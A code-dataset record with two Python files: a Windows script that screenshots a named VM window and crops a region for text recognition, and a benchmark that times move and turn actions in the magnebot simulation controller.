# -*- coding: utf-8 -*- """ capture the VM screen then use hanwang text recognize the text then use baidu to search answer """ import ctypes import os import time import win32gui import win32com.client import win32con from PIL import Image, ImageGrab class RECT(ctypes.Structure): _fields_ = [('left', ctypes.c_long), ('top', ctypes.c_long), ('right', ctypes.c_long), ('bottom', ctypes.c_long)] def __str__(self): return str((self.left, self.top, self.right, self.bottom)) def analyze_current_screen_text(label,directory="."): """ capture the VM screen now :return: """ # print("capture time: ", datetime.now().strftime("%H:%M:%S")) hld = win32gui.FindWindow(None, label) if hld > 0: screenshot_filename = "screenshot.png" save_text_area = os.path.join(directory, "text_area.png") capture_screen(hld,screenshot_filename, directory) parse_answer_area(os.path.join(directory, screenshot_filename), save_text_area) return get_area_data(save_text_area) else: print('咦,你没打开'+label+'吧!') def capture_screen(hld,filename="screenshot.png", directory="."): win32gui.ShowWindow(hld, win32con.SW_RESTORE) shell = win32com.client.Dispatch("WScript.Shell") shell.SendKeys('%') win32gui.SetForegroundWindow(hld) time.sleep(1) rect = RECT() ctypes.windll.user32.GetWindowRect(hld,ctypes.byref(rect)) rangle = (rect.left,rect.top,rect.right,rect.bottom) im = ImageGrab.grab(rangle) im.save(os.path.join(directory, filename)) def parse_answer_area(source_file, text_area_file): """ crop the answer area :return: """ image = Image.open(source_file) wide = image.size[0] # print("screen width: {0}, screen height: {1}".format(image.size[0], image.size[1])) region = image.crop((0, 100, wide, 500)) region.save(text_area_file) def get_area_data(text_area_file): """ :param text_area_file: :return: """ with open(text_area_file, "rb") as fp: image_data = fp.read() return image_data return ""
25.72619
89
0.649236
e809fa3da29481d331bcc8c16cfde7a471689892
2,082
py
Python
controllers/tests/benchmark/benchmark.py
neuroailab/magnebot
3f537fcd95685efeadf7200208a310a4c6a2f10c
[ "MIT" ]
null
null
null
controllers/tests/benchmark/benchmark.py
neuroailab/magnebot
3f537fcd95685efeadf7200208a310a4c6a2f10c
[ "MIT" ]
null
null
null
controllers/tests/benchmark/benchmark.py
neuroailab/magnebot
3f537fcd95685efeadf7200208a310a4c6a2f10c
[ "MIT" ]
null
null
null
from typing import List from time import time from magnebot.test_controller import TestController class Benchmark(TestController): """ Run simple benchmarks for the average speed of an action. In an actual use-case, the action will usually be somewhat slower because of the complexity of the scene. """ def __init__(self, port: int = 1071, screen_width: int = 256, screen_height: int = 256): super().__init__(port=port, screen_height=screen_height, screen_width=screen_width) self._debug = False def move_fps(self) -> float: """ Benchmark the speed of `move_by()`. :return: The average time elapsed per action. """ self.init_scene() return self._get_move_fps() def turn_fps(self) -> float: """ Benchmark the speed of `turn_by()`. :return: The average time elapsed per action. """ self.init_scene() times: List[float] = list() for i in range(20): t0 = time() self.turn_by(45) times.append(time() - t0) return sum(times) / len(times) def step_fps(self) -> None: print("| Skipped frames | Time elapsed |\n| --- | --- |") for frames in [0, 5, 10, 15, 20]: self.init_scene() self._skip_frames = frames t = self._get_move_fps() print(f"| {frames} | {t} |") def _get_move_fps(self) -> float: """ Move backwards and forwards and get the average time elapsed per action. :return: The average time elapsed of the action. """ times: List[float] = list() direction = 1 for i in range(20): if i > 0 and i % 5 == 0: direction *= -1 t0 = time() self.move_by(0.5 * direction) times.append(time() - t0) return sum(times) / len(times) if __name__ == "__main__": m = Benchmark() print(f"turn_by(): {m.turn_fps()}") print(f"move_by(): {m.move_fps()}") m.step_fps() m.end()
27.76
109
0.561479